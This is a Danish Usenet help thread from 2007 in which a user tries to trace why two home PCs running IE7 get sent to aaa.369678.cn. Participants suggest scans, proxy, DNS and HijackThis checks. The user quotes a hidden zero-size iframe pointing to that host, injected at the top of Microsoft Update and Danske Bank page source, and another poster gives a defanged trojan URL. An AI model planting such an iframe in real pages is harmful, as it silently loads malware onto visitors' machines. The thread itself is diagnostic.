---

Problem:

Et eller andet sted i min pc ligger der noget, som får min computer til at
gå ind på siten aaa.369678.cn og søge efter dokumentet ppp.htm når jeg
besøger nogle bestemte URL's. CN-endelsen antyder, at jeg er en tur i
Kina...

Eksempler på URL's, som fører mig et smut til Kina er:

update.microsoft.com
www.shg.dk
www.troeroedskolen.dk
og mange andre

Fælles for ovennævnte URL's er, at legen stopper der - browseren forbliver
næsten blank og der kommer ikke noget frem på skærmen.

Andre URL's har den effekt, at kineserne prøver at få mig ind på
aaa.369678.cn, hvorefter den rigtige website alligevel tager over og får mig
reddet tilbage til Vesten igen.

Hvad jeg har forsøgt uden at det har hjulpet:

Jeg har slettet alt i min IE 7 (engelsk version) - cookies, temporære filer
og alt andet
Jeg har kigget i hosts filerne
Jeg har scannet hele pc'en med Kaspersky, Symantec Norton og Windows
Defender
Jeg har renset registreringsbasen for alle referencer til aaa.369678.cn og
alt, hvad der kan ligne
Jeg har søgt på hele pc'en efter filer og IP-adresser med relation til den
kinesiske site
Jeg har søgt på Google efter hjælp - her findes mange referencer til siten,
men kun på kinesisk
Jeg har tjekket min router for sære referencer men ikke fundet noget
mistænkeligt
Jeg har disablet SAMTLIGE add-ons ect. i IE7, men intet har ændret
situationen.
Jeg har lukket for aaa.369678.cn i min firewall

Vi har to pc'er i huset, som har dette problem. Problemet er 100 %
konsekvent.
Den anden pc har fået reinstalleret IE7, men det afhjalp ikke problemet.

Hvis en af jer eksperter har et bud på, hvor kineserne gemmer sig i mine
pc'er, vil jeg virkelig blive glad. Jeg føler mig besat af kinesere og er
ikke helt klar over, hvad der egentlig sker på aaa.369678.cn siten. Den er
kendt som et sted, hvor man ikke bør komme!

HJÆLP!

hilsen
lars

---

Lars Knudsen skrev:
> Problem:
>
> Et eller andet sted i min pc ligger der noget, som får min computer til at
> gå ind på siten aaa.369678.cn og søge efter dokumentet ppp.htm når jeg
> besøger nogle bestemte URL's. CN-endelsen antyder, at jeg er en tur i
> Kina...

> Vi har to pc'er i huset, som har dette problem. Problemet er 100 %
> konsekvent.
> Den anden pc har fået reinstalleret IE7, men det afhjalp ikke problemet.
>
> Hvis en af jer eksperter har et bud på, hvor kineserne gemmer sig i mine
> pc'er, vil jeg virkelig blive glad. Jeg føler mig besat af kinesere og er
> ikke helt klar over, hvad der egentlig sker på aaa.369678.cn siten. Den er
> kendt som et sted, hvor man ikke bør komme!
>

Jeg er langt fra ekspert, men et skud fra hoften:
Har du scannet din computer for spyware, adware og
lignende? Har du slettet alle dine cookies?


--

Med venlig hilsen
Jørgen Farum Jensen
Håndbog i webdesign: http://webdesign101.dk/wwwbog/udgave2/
Webdesign med stylesheets: http://webdesign101.dk/cssbog/
..

---

Jørgen Farum Jensen wrote:

> Har du slettet alle dine cookies?
>
Hvad skulle det hjælpe?
Lægmærke til det kun er antispyware der
vil have penge op af lommen på dig der
sletter cookies og bruger mange kræfter
på at fortælle om det.

mvh
Henning

---

Lars Knudsen skrev:
> Problem:
>
> Et eller andet sted i min pc ligger der noget, som får min computer til at
> gå ind på siten aaa.369678.cn og søge efter dokumentet ppp.htm når jeg
> besøger nogle bestemte URL's. CN-endelsen antyder, at jeg er en tur i
> Kina...
>
> Eksempler på URL's, som fører mig et smut til Kina er:
>
> update.microsoft.com
> www.shg.dk
> www.troeroedskolen.dk
> og mange andre
>
> Fælles for ovennævnte URL's er, at legen stopper der - browseren forbliver
> næsten blank og der kommer ikke noget frem på skærmen.
>
> Andre URL's har den effekt, at kineserne prøver at få mig ind på
> aaa.369678.cn, hvorefter den rigtige website alligevel tager over og får mig
> reddet tilbage til Vesten igen.
>
> Hvad jeg har forsøgt uden at det har hjulpet:
>
> Jeg har slettet alt i min IE 7 (engelsk version) - cookies, temporære filer
> og alt andet
> Jeg har kigget i hosts filerne
> Jeg har scannet hele pc'en med Kaspersky, Symantec Norton og Windows
> Defender
> Jeg har renset registreringsbasen for alle referencer til aaa.369678.cn og
> alt, hvad der kan ligne
> Jeg har søgt på hele pc'en efter filer og IP-adresser med relation til den
> kinesiske site
> Jeg har søgt på Google efter hjælp - her findes mange referencer til siten,
> men kun på kinesisk
> Jeg har tjekket min router for sære referencer men ikke fundet noget
> mistænkeligt
> Jeg har disablet SAMTLIGE add-ons ect. i IE7, men intet har ændret
> situationen.
> Jeg har lukket for aaa.369678.cn i min firewall
>
> Vi har to pc'er i huset, som har dette problem. Problemet er 100 %
> konsekvent.
> Den anden pc har fået reinstalleret IE7, men det afhjalp ikke problemet.
>
> Hvis en af jer eksperter har et bud på, hvor kineserne gemmer sig i mine
> pc'er, vil jeg virkelig blive glad. Jeg føler mig besat af kinesere og er
> ikke helt klar over, hvad der egentlig sker på aaa.369678.cn siten. Den er
> kendt som et sted, hvor man ikke bør komme!
>
> HJÆLP!
>
> hilsen
> lars
>
>
Hej.
Har været inde at kikke lidt på de kinesiske sider.
Det ser ud til at der er en Trojan, der hedder
hXXp://aaa.369678.cn/wm/xjz2007.bmp
Win32/TrojanDownloader.Ani.Gen 木马的变种

Læs mere om Trojanen her:
http://www.xblock.com/product_show.php?id=3548

Du skal sikkert bruge et godt antivirusprogram,
eller måske det lille gode gratis program, der
hedder superantispyware, som kan hentes på spywarefri.dk

mvh
Erling

---

Erling S. skrev:
> Lars Knudsen skrev:
>> Problem:
>>
>> Et eller andet sted i min pc ligger der noget, som får min computer
>> til at
>> gå ind på siten aaa.369678.cn og søge efter dokumentet ppp.htm når jeg
>> besøger nogle bestemte URL's. CN-endelsen antyder, at jeg er en tur i
>> Kina...
>>
>> Eksempler på URL's, som fører mig et smut til Kina er:
>>
>> update.microsoft.com
>> www.shg.dk
>> www.troeroedskolen.dk
>> og mange andre
>>
>> Fælles for ovennævnte URL's er, at legen stopper der - browseren
>> forbliver
>> næsten blank og der kommer ikke noget frem på skærmen.
>>
>> Andre URL's har den effekt, at kineserne prøver at få mig ind på
>> aaa.369678.cn, hvorefter den rigtige website alligevel tager over og
>> får mig
>> reddet tilbage til Vesten igen.
>>
>> Hvad jeg har forsøgt uden at det har hjulpet:
>>
>> Jeg har slettet alt i min IE 7 (engelsk version) - cookies, temporære
>> filer
>> og alt andet
>> Jeg har kigget i hosts filerne
>> Jeg har scannet hele pc'en med Kaspersky, Symantec Norton og Windows
>> Defender
>> Jeg har renset registreringsbasen for alle referencer til
>> aaa.369678.cn og
>> alt, hvad der kan ligne
>> Jeg har søgt på hele pc'en efter filer og IP-adresser med relation til
>> den
>> kinesiske site
>> Jeg har søgt på Google efter hjælp - her findes mange referencer til
>> siten,
>> men kun på kinesisk
>> Jeg har tjekket min router for sære referencer men ikke fundet noget
>> mistænkeligt
>> Jeg har disablet SAMTLIGE add-ons ect. i IE7, men intet har ændret
>> situationen.
>> Jeg har lukket for aaa.369678.cn i min firewall
>>
>> Vi har to pc'er i huset, som har dette problem. Problemet er 100 %
>> konsekvent.
>> Den anden pc har fået reinstalleret IE7, men det afhjalp ikke problemet.
>>
>> Hvis en af jer eksperter har et bud på, hvor kineserne gemmer sig i mine
>> pc'er, vil jeg virkelig blive glad. Jeg føler mig besat af kinesere og er
>> ikke helt klar over, hvad der egentlig sker på aaa.369678.cn siten.
>> Den er
>> kendt som et sted, hvor man ikke bør komme!
>>
>> HJÆLP!
>>
>> hilsen
>> lars
>>
>>
> Hej.
> Har været inde at kikke lidt på de kinesiske sider.
> Det ser ud til at der er en Trojan, der hedder
> hXXp://aaa.369678.cn/wm/xjz2007.bmp Win32/TrojanDownloader.Ani.Gen 木马
> 的变种
>
> Læs mere om Trojanen her:
> http://www.xblock.com/product_show.php?id=3548
>
> Du skal sikkert bruge et godt antivirusprogram,
> eller måske det lille gode gratis program, der
> hedder superantispyware, som kan hentes på spywarefri.dk
>
> mvh
> Erling
Prøv evt. også med den xcleaner, som xblock refererer til.
Jeg har været inde at læse, om den er i orden. Det skulle den
være ifølge TDC.
/Erling

---

Tak til Erling og Jørgen

Jeg har brugt både AVG, Symantec Norton, Microsoft One Care og Kaspersky
anti-virus uden resultatet.
De melder ikke om virus på maskinen.

Jeg har haft en 45 minutter lang online-chat med Symantec Nortons
supportfolk, som løb en del ting igennem med mig, gav lidt (ubrugelige) gode
råd og i øvrigt ikke kunne hjælpe med noget. De endte med at konkludere, at
jeg burde kontakte Microsofts support.

Jeg har også kørt Microsoft Defender samt SpyBot Search and Destroy samt
AdAware 2007.

Nu vil jeg prøve superantispyware og se, om den kan gøre noget alle de andre
ikke kunne.

Det, der undrer mig mest er, at det kun er nogle websites, der er ramt, og
at jeg ikke kan se nogen sammenhæng i, hvilke der rammes og ikke rammes. Det
kunne måske være noget med teknik, men jeg kan ikke se sammenhængen, da det
rammer tekniske forskellige websider.

Men hvor i alverden kan der ligge noget i pc'en, som får min IE7 browser til
at starte på det rette websted og så straks hoppe over til Kina?

hilsen
lars


"Erling S." <erling.nospam@xmail.com> wrote in message
news:471f5482$0$2097$edfadb0f@dtext02.news.tele.dk...
> Erling S. skrev:
>> Lars Knudsen skrev:
>>> Problem:
>>>
>>> Et eller andet sted i min pc ligger der noget, som får min computer til
>>> at
>>> gå ind på siten aaa.369678.cn og søge efter dokumentet ppp.htm når jeg
>>> besøger nogle bestemte URL's. CN-endelsen antyder, at jeg er en tur i
>>> Kina...
>>>
>>> Eksempler på URL's, som fører mig et smut til Kina er:
>>>
>>> update.microsoft.com
>>> www.shg.dk
>>> www.troeroedskolen.dk
>>> og mange andre
>>>
>>> Fælles for ovennævnte URL's er, at legen stopper der - browseren
>>> forbliver
>>> næsten blank og der kommer ikke noget frem på skærmen.
>>>
>>> Andre URL's har den effekt, at kineserne prøver at få mig ind på
>>> aaa.369678.cn, hvorefter den rigtige website alligevel tager over og får
>>> mig
>>> reddet tilbage til Vesten igen.
>>>
>>> Hvad jeg har forsøgt uden at det har hjulpet:
>>>
>>> Jeg har slettet alt i min IE 7 (engelsk version) - cookies, temporære
>>> filer
>>> og alt andet
>>> Jeg har kigget i hosts filerne
>>> Jeg har scannet hele pc'en med Kaspersky, Symantec Norton og Windows
>>> Defender
>>> Jeg har renset registreringsbasen for alle referencer til aaa.369678.cn
>>> og
>>> alt, hvad der kan ligne
>>> Jeg har søgt på hele pc'en efter filer og IP-adresser med relation til
>>> den
>>> kinesiske site
>>> Jeg har søgt på Google efter hjælp - her findes mange referencer til
>>> siten,
>>> men kun på kinesisk
>>> Jeg har tjekket min router for sære referencer men ikke fundet noget
>>> mistænkeligt
>>> Jeg har disablet SAMTLIGE add-ons ect. i IE7, men intet har ændret
>>> situationen.
>>> Jeg har lukket for aaa.369678.cn i min firewall
>>>
>>> Vi har to pc'er i huset, som har dette problem. Problemet er 100 %
>>> konsekvent.
>>> Den anden pc har fået reinstalleret IE7, men det afhjalp ikke problemet.
>>>
>>> Hvis en af jer eksperter har et bud på, hvor kineserne gemmer sig i mine
>>> pc'er, vil jeg virkelig blive glad. Jeg føler mig besat af kinesere og
>>> er
>>> ikke helt klar over, hvad der egentlig sker på aaa.369678.cn siten. Den
>>> er
>>> kendt som et sted, hvor man ikke bør komme!
>>>
>>> HJÆLP!
>>>
>>> hilsen
>>> lars
>>>
>>>
>> Hej.
>> Har været inde at kikke lidt på de kinesiske sider.
>> Det ser ud til at der er en Trojan, der hedder
>> hXXp://aaa.369678.cn/wm/xjz2007.bmp Win32/TrojanDownloader.Ani.Gen ?? ???
>>
>> Læs mere om Trojanen her:
>> http://www.xblock.com/product_show.php?id=3548
>>
>> Du skal sikkert bruge et godt antivirusprogram,
>> eller måske det lille gode gratis program, der
>> hedder superantispyware, som kan hentes på spywarefri.dk
>>
>> mvh
>> Erling
> Prøv evt. også med den xcleaner, som xblock refererer til.
> Jeg har været inde at læse, om den er i orden. Det skulle den
> være ifølge TDC.
> /Erling

---

Den 24-10-07 17.08 skrev Lars Knudsen følgende:

> Det, der undrer mig mest er, at det kun er nogle websites, der er ramt, og
> at jeg ikke kan se nogen sammenhæng i, hvilke der rammes og ikke rammes. Det
> kunne måske være noget med teknik, men jeg kan ikke se sammenhængen, da det
> rammer tekniske forskellige websider.

D uhar selv undersøgt det mest oplagte, nemlig en ændring i hosts-filen.
En anden mulighed kan være, at det slemme program, du er blevet smittet
med har installeret et proxy. Prøv at tjekke, om Internet Explorer er
sat til at bruge en proxy.

Prøv evt. også at downloade en alternativ browser som fx Firefox for at
se, om problemet også findes i den. Om ikke andet kan det give et
fingerpeg om, hvorvidt problemet ligger i Windows eller Internet Explorer.

P. S. Du må meget gerne følge netiketten med hensyn til citater. Der er
ingen grund til at citere alle de foregående indlæg i tråden. Svar også
under det citerede i stedet for øverst i indlægget. Du kan evt. tjekke
denne side:
http://kimludvigsen.dk/diverse-nyhedsgrupper-citat.html


--
Mvh. Kim Ludvigsen
Polimiken - en levende netavis, der tør, hvor selv Ekstra Bladet tier.
http://polimiken.dk

---

"Kim Ludvigsen" <usenet@kimludvigsen.dk> wrote in message
news:471f63a2$0$2094$edfadb0f@dtext02.news.tele.dk...
> Den 24-10-07 17.08 skrev Lars Knudsen følgende:
>
>> Det, der undrer mig mest er, at det kun er nogle websites, der er ramt,
>> og at jeg ikke kan se nogen sammenhæng i, hvilke der rammes og ikke
>> rammes. Det kunne måske være noget med teknik, men jeg kan ikke se
>> sammenhængen, da det rammer tekniske forskellige websider.
>
> D uhar selv undersøgt det mest oplagte, nemlig en ændring i hosts-filen.
> En anden mulighed kan være, at det slemme program, du er blevet smittet
> med har installeret et proxy. Prøv at tjekke, om Internet Explorer er sat
> til at bruge en proxy.
>
> Prøv evt. også at downloade en alternativ browser som fx Firefox for at
> se, om problemet også findes i den. Om ikke andet kan det give et
> fingerpeg om, hvorvidt problemet ligger i Windows eller Internet Explorer.
>
> P. S. Du må meget gerne følge netiketten med hensyn til citater. Der er
> ingen grund til at citere alle de foregående indlæg i tråden. Svar også
> under det citerede i stedet for øverst i indlægget. Du kan evt. tjekke
> denne side:
> http://kimludvigsen.dk/diverse-nyhedsgrupper-citat.html
>
>
> --
> Mvh. Kim Ludvigsen
> Polimiken - en levende netavis, der tør, hvor selv Ekstra Bladet tier.
> http://polimiken.dk

Tak,

Jeg vil naturligvis forsøge at følge netiketten og håber, at denne måde så
er rigtig. Jeg kigger på din side senere.

Jeg har snart prøvet det meste. Nej, der er ikke sat nogen proxy, men ideen
var god.

Vi har ca. 7 pc'er i huset og kun to af dem har problemet. De sidder alle i
netværk og der spilles på dem, så hvis der var tale om en virus burde de vel
alle være smittet og have problemet.

Jeg er stadig meget forundret over, at nogle bestemte sites fanges og er
umulige at komme i kontakt med. Meget sært!

hilsen
lars

---

Lars Knudsen skrev:

>> P. S. Du må meget gerne følge netiketten med hensyn til citater.

> Jeg vil naturligvis forsøge at følge netiketten og håber, at denne måde så
> er rigtig. Jeg kigger på din side senere.

Du behøver slet ikke at have hele det foregående indlæg med.

Altså: Slet signaturen fra forrige indlæg, slet alt, der er irelevant for
dit indlæg. Det gør det meget nemmere at læse, det du skriver, og nemmere at
svare.

Se evt. (når du får tid): http://usenet.dk/netikette/citatteknik.html

--
David Trasbo.

---

Jeg kiggede lige på sourcen på update.microsoft.com siden, som ikke viser
noget overhovedet på grund af den kinesiske site.

Dette stod som øverste linje i sourcen til siden:

<iframe src='http://aaa.369678.cn/ppp.htm' width=0 height=0></iframe>

Hvordan i alverden er det blevet indsat på Microsofts update-site?

hilsen
lars

---

Lars Knudsen wrote:
> Jeg kiggede lige på sourcen på update.microsoft.com siden, som ikke
> viser noget overhovedet på grund af den kinesiske site.
>
> Dette stod som øverste linje i sourcen til siden:
>
> <iframe src='http://aaa.369678.cn/ppp.htm' width=0
> height=0></iframe>
> Hvordan i alverden er det blevet indsat på Microsofts update-site?
>
Har jeg ikke den fjerneste ide om, men da jeg læste tråden slog det mig at
du ikke skrivernoget om at du har slået "gendannelsespunkterne" fra når du
skanner ? Jeg kan huske fra tidligere at nogen "uhyrligheder" gemte sig i
dem og tittede frem så snart maskinen startede igen.
Det lyder måske lidt langt ude med dit problem, men det er det eneste jeg
kan komme på udover en format
--
MVH
Pico

---

Lars Knudsen skrev:
> Hvordan i alverden er det blevet indsat på Microsofts update-site?

Prøv at uploade en Hijackthis-log til forum på spywarefri.dk - her
plejer eksperterne at kunne finde en løsning.

---

In article <471f958e$0$15876$edfadb0f@dtext01.news.tele.dk>,
zillyking@hotmail.com says...
> Jeg kiggede lige på sourcen på update.microsoft.com siden, som ikke viser
> noget overhovedet på grund af den kinesiske site.
>
> Dette stod som øverste linje i sourcen til siden:
>
> <iframe src='http://aaa.369678.cn/ppp.htm' width=0 height=0></iframe>
>
> Hvordan i alverden er det blevet indsat på Microsofts update-site?

Det lyder nu some en proxy, noget som opfanger siden og indsætter noget
andet.

---

In article <471f3cfa$0$15880$edfadb0f@dtext01.news.tele.dk>,
zillyking@hotmail.com says...
> Problem:
>
>

Har du checket at dine DNS addresser er som de skal være?

---

Igen tusinde tak for ideer og forslag.

Ja, jeg har tjekket DNS og det har ikke noget med genstart af systemet at
gøre, så jeg kan ikke forestille mig, at genstartspunkterne har nogen
indflydelse på problemet.

Jeg vil prøve at oploade noget til spyware-forumet og se, om nogen der kan
komme med det forløsende tip.

Bemærk i øvrigt, at problemet øjensynlig opstår, fordi der indsættes en
usynlig frame øverst på websiderne.
Her er et eksempel fra DANSKEBANK.DK - "skurken" ser ud til at være 1.
linje:

----------

<iframe src='http://aaa.369678.cn/ppp.htm' width=0 height=0></iframe>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<HTML>
<HEAD>
<TITLE>Danske Bank</TITLE><META NAME="description" CONTENT="Danske Bank, Lån
penge, handel med valuta, aktier og obligationer og få rådgivning om penge
og privatøkonomi i Danske Bank."><META NAME="keywords" CONTENT="Danske Bank,
Aktieanalyser, Aktiekurser, Aktier, Bank, Banker, Banklån, Bilforsikringer,
Billån, Boligkøb, Boliglån, Brandforsikring, Eboks, Ferie, Finans,
Finansiering, Forbrugslån, Forsikringer, Forsikringsselskaber, Homebanking,
Investering, Investor Relations, Kapitalpension, Kredit, Kreditkort, Lån,
Lånetilbud, Netbank, Netshop, Obligationer, Office Banking, Opsparing,
Penge, Pengeinstitutter, Pension, Pensionskasser, Privatlån, Privatøkonomi,
Realkredit, Sparekasser, Studie, Sygeforsikringen, Udlån, Valuta,
Valutakurser, Økonomi, å">
<script type="text/javascript"> d=document.domain;var t=d.split(".");
(d.indexOf("co.uk") > -1 )?dot=3:dot=2;if (dot < t.length){d="";for
(i=t.length-dot; i<dot; i++){d+=t[i] + '.'};d+=t[dot];document.domain=d;}
var stylefileHP="DanskeBank";
var tohometxt="";
var tohomelink="";
var subsitetxt="";
var subsitelink=" ";
</script>
<meta name="verify-v1"
content="cxkAqaKMHrdiJmCv/eqF+dxSRnoysRF0g/D1X2IZ2wU=">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="Author" CONTENT="Danske Bank">
<meta name="Language" CONTENT="danish" lang="da">
<link rel="icon" href="/image/dblogoikon/$file/dblogoikon.ico"
type="image/x-icon">
<link rel="shortcut icon" href="/image/dblogoikon/$file/dblogoikon.ico"
type="image/x-icon">
<SCRIPT type="text/javascript">
var senddata=new Image;
var mainLayerLoaded = false;
var ishomepage = true;
var path="";

osv., osv.

hilsen
lars

---

Den 29-10-07 15.57 skrev Lars Knudsen følgende:
> Igen tusinde tak for ideer og forslag.

> Bemærk i øvrigt, at problemet øjensynlig opstår, fordi der indsættes en
> usynlig frame øverst på websiderne.

Jeg ved ikke, om der pt. er åbne sikkerhedshuller med hensyn til rammer,
men der har været huller, hvor det har været muligt at overføre data
mellem rammerne. Indstil du har fået fjernet skidtet, vil det sikkert
være en ganske god ide at undgå at besøge hjemmesider, hvor du indtaster
koder.

--
Mvh. Kim Ludvigsen
Polimiken - en levende netavis, der tør, hvor selv Ekstra Bladet tier.
http://polimiken.dk